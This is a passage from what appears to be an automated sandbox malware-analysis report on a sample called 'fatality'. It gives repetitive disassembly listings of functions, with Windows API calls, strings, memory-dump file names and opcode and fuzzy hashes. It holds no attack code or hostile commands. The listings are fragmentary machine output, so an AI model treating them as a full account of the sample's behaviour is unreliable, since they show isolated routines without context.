                                                                    • Opcode Fuzzy Hash: 592491b79c642b8da15caf849efa9935b2894d7528600c2be25eb8855821c59e
                                                                    • Instruction Fuzzy Hash: 3D01D8321183126DF6252EB57C8DA9A3BDDEB117B8760673EF610751E0EF114C849544
                                                                    Function 00DFDC3B Relevance: 6.0, APIs: 4, Instructions: 42windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DFDC61
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFDC72
                                                                    • TranslateMessage.USER32(?), ref: 00DFDC7C
                                                                    • DispatchMessageW.USER32(?), ref: 00DFDC86
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Message$DispatchPeekTranslate
                                                                    • String ID:
                                                                    • API String ID: 4217535847-0
                                                                    • Opcode ID: c8bbc2effcca0226e26f40a5828eda5ac10757c0a5e5b818a11123c30d2c8021
                                                                    • Instruction ID: 30728ca825c9c636aa4d585038c9e1e3aa65bb495c8ba14a5fb5e7d969c6a363
                                                                    • Opcode Fuzzy Hash: c8bbc2effcca0226e26f40a5828eda5ac10757c0a5e5b818a11123c30d2c8021
                                                                    • Instruction Fuzzy Hash: 6BF03C72A01219BBCB206BA6DC4CDDF7F7EEF46791B148121B60AE2051D674864AC7B0
                                                                    Function 00DF1FDD Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID:
                                                                    • API String ID: 176396367-0
                                                                    • Opcode ID: edc7b52944b821ae02021a162fdf6c067fc54fa595eb7ff0b9a8b373126b97bf
                                                                    • Instruction ID: 0f4ca17c0abbaea3d1210f8481a4234b2894c59b6f658ba31bf4d38b585c606c
                                                                    • Opcode Fuzzy Hash: edc7b52944b821ae02021a162fdf6c067fc54fa595eb7ff0b9a8b373126b97bf
                                                                    • Instruction Fuzzy Hash: F8F06D33008118BFCF225F61EC09DDA3F6AEB44760B11C005F61A6A0A2CB72D6A2D690
                                                                    Function 00DFA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 00DFA666
                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00DFA675
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DFA683
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00DFA691
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDevice$Release
                                                                    • String ID:
                                                                    • API String ID: 1035833867-0
                                                                    • Opcode ID: 53d86e12561fdf3f8f6f737c59f885ff07e49f6d14d3c5a949230826b24d857b
                                                                    • Instruction ID: 3322c7dec92ee66d1782f136e8b61a7b3dd6279e3c50edf774adf76bd4c99721
                                                                    • Opcode Fuzzy Hash: 53d86e12561fdf3f8f6f737c59f885ff07e49f6d14d3c5a949230826b24d857b
                                                                    • Instruction Fuzzy Hash: C5E0E635942721AFD3615B766D0DB8B3E54AB16B52F054301F605B5190DB64450A8BA1
                                                                    Function 00E0B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID: *?$.
                                                                    • API String ID: 269201875-3972193922
                                                                    • Opcode ID: 9ea54cabc149a7bf8f0739983d84df0ad1cd527b12044001bb6944ddd1c94f41
                                                                    • Instruction ID: c54ab9f055ae1ae0ed3cac41ade5971608fedc4a2ec2f9c4c43848a112591c6d
                                                                    • Opcode Fuzzy Hash: 9ea54cabc149a7bf8f0739983d84df0ad1cd527b12044001bb6944ddd1c94f41
                                                                    • Instruction Fuzzy Hash: 98519D71E0020AAFDF14DFA8C881AADBBF5FF58314F245169E844F7391E7759A418B50
                                                                    Function 00DF161C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _swprintf
                                                                    • String ID: %ls$%s: %s
                                                                    • API String ID: 589789837-2259941744
                                                                    • Opcode ID: bad46e398743cecb53c1277b9fa68157014ff02d99359abef047137dfd92d08a
                                                                    • Instruction ID: f561d811f4b4c4436d1a403b2e8846b9d4230a00fca04d75bebd85114bf05857
                                                                    • Opcode Fuzzy Hash: bad46e398743cecb53c1277b9fa68157014ff02d99359abef047137dfd92d08a
                                                                    • Instruction Fuzzy Hash: DA41A93D28830CF6E6112A909E46F317665EB05B44F26C607F7DEB84E1D9A3D450BB3A
                                                                    Function 00DE9382 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DE9387
                                                                      • Part of subcall function 00DEC29A: _wcslen.LIBCMT ref: 00DEC2A2
                                                                    • _swprintf.LIBCMT ref: 00DE9465
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog_swprintf_wcslen
                                                                    • String ID: rtmp%d
                                                                    • API String ID: 4240179315-3303766350
                                                                    • Opcode ID: b2b10d973c1b496973a23d55ab3df39a3df58aaacba80a0364173c9a12038129
                                                                    • Instruction ID: 8283f3f6fcc9a136969db0da76a98928b7d0ba522c1a0824c77958dd22021184
                                                                    • Opcode Fuzzy Hash: b2b10d973c1b496973a23d55ab3df39a3df58aaacba80a0364173c9a12038129
                                                                    • Instruction Fuzzy Hash: CE418871901299AACF21FB62CC55DEEB37CEF45340F0488A5B649E3051DB388B898B74
                                                                    Function 00DEB37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcschr
                                                                    • String ID: *
                                                                    • API String ID: 2691759472-163128923
                                                                    • Opcode ID: eea8a9dfbd7b31f8b35dba31094e2fd62e80c7046ba4a81ab6d92cf5b559ef3e
                                                                    • Instruction ID: 83ee1b764665099ddfc15e8a7c05f7ce9d527920fe39f4a0734c217efc5ce304
                                                                    • Opcode Fuzzy Hash: eea8a9dfbd7b31f8b35dba31094e2fd62e80c7046ba4a81ab6d92cf5b559ef3e
                                                                    • Instruction Fuzzy Hash: 553114221043819ADB30BA578942A7B73E8DF90B3CB18801FF9C8571C3E766BD819671
                                                                    Function 00E031D6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _abort
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 1888311480-2084237596
                                                                    • Opcode ID: ff46e065b4db9065a0124c80e302aca17463e986f3d83de8e2d1e2e6caebe209
                                                                    • Instruction ID: ac2930d5eedceb0ea138c9b39d7941aead85ec9e06318b7cd22952a61f047ff2
                                                                    • Opcode Fuzzy Hash: ff46e065b4db9065a0124c80e302aca17463e986f3d83de8e2d1e2e6caebe209
                                                                    • Instruction Fuzzy Hash: 3D415871900209AFCF15DFA4CD81AEEBBB9FF48308F189059FA04762A5D735AA90DB50
                                                                    Function 00DE7401 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DE7406
                                                                      • Part of subcall function 00DE3BBA: __EH_prolog.LIBCMT ref: 00DE3BBF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                    • API String ID: 3519838083-639343689
                                                                    • Opcode ID: d37526e7ea483aaf26e6ece986f1edc70717013b6aed07367137ecc229039f3c
                                                                    • Instruction ID: 9518dbae9049f63f3e8f0cc34c80a319e619924ae06486b17720cf2fa8e13550
                                                                    • Opcode Fuzzy Hash: d37526e7ea483aaf26e6ece986f1edc70717013b6aed07367137ecc229039f3c
                                                                    • Instruction Fuzzy Hash: 4931C371D04298AEDF51FBA6DC45FEE7BB9EB19304F084055F405B7182C7748A848771
                                                                    Function 00DFB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: }
                                                                    • API String ID: 176396367-4239843852
                                                                    • Opcode ID: 929c96203e6a390aa30b55ea081c8520d3dcbce445f1575dab006a599c67cffc
                                                                    • Instruction ID: 891c000be67bacb16a09baa7ebe2c6052088e4487610dcf21a9ee6655ff053c3
                                                                    • Opcode Fuzzy Hash: 929c96203e6a390aa30b55ea081c8520d3dcbce445f1575dab006a599c67cffc
                                                                    • Instruction Fuzzy Hash: EF21D17290430E5AD731AA64D845E7AB3DCDF91764F0A442BF680D3241EB69D98883B2
                                                                    Function 00DFDDA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DialogBoxParamW.USER32(GETPASSWORD1,00010486,00DFB270,?,?), ref: 00DFDE18
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: DialogParam
                                                                    • String ID: GETPASSWORD1$xz
                                                                    • API String ID: 665744214-3234807970
                                                                    • Opcode ID: 439e65d6f826c1815e5d36a952172d32779a23873286aca4622dc00eb8694b46
                                                                    • Instruction ID: 41cffaec4206c60176fa565e7adb18d09156188d11802f1c38269f56a3063ab7
                                                                    • Opcode Fuzzy Hash: 439e65d6f826c1815e5d36a952172d32779a23873286aca4622dc00eb8694b46
                                                                    • Instruction Fuzzy Hash: A0110F72600258AFDB21EB35EC01BFF3796A755750F158065BE45BB080C6B49D89C774
                                                                    Function 00DE1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00DEE2E8: _swprintf.LIBCMT ref: 00DEE30E
                                                                      • Part of subcall function 00DEE2E8: _strlen.LIBCMT ref: 00DEE32F
                                                                      • Part of subcall function 00DEE2E8: SetDlgItemTextW.USER32(?,00E1E274,?), ref: 00DEE38F
                                                                      • Part of subcall function 00DEE2E8: GetWindowRect.USER32(?,?), ref: 00DEE3C9
                                                                      • Part of subcall function 00DEE2E8: GetClientRect.USER32(?,?), ref: 00DEE3D5
                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
                                                                    • SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                    • String ID: 0
                                                                    • API String ID: 2622349952-4108050209
                                                                    • Opcode ID: 73e69a6fb673cab2601ff750b2f98f05ed9f81b2baff755a608771bd7b1c52aa
                                                                    • Instruction ID: 3f356b9934b464f9e2802fe608a99d1828f8dda310a80dfab2a21b3825bcf27f
                                                                    • Opcode Fuzzy Hash: 73e69a6fb673cab2601ff750b2f98f05ed9f81b2baff755a608771bd7b1c52aa
                                                                    • Instruction Fuzzy Hash: 43F0AF782043C8ABDF152FA28C0EBEA3B59AF41344F088314FD84609E1CB74CA95EA30

                                                                    Executed Functions

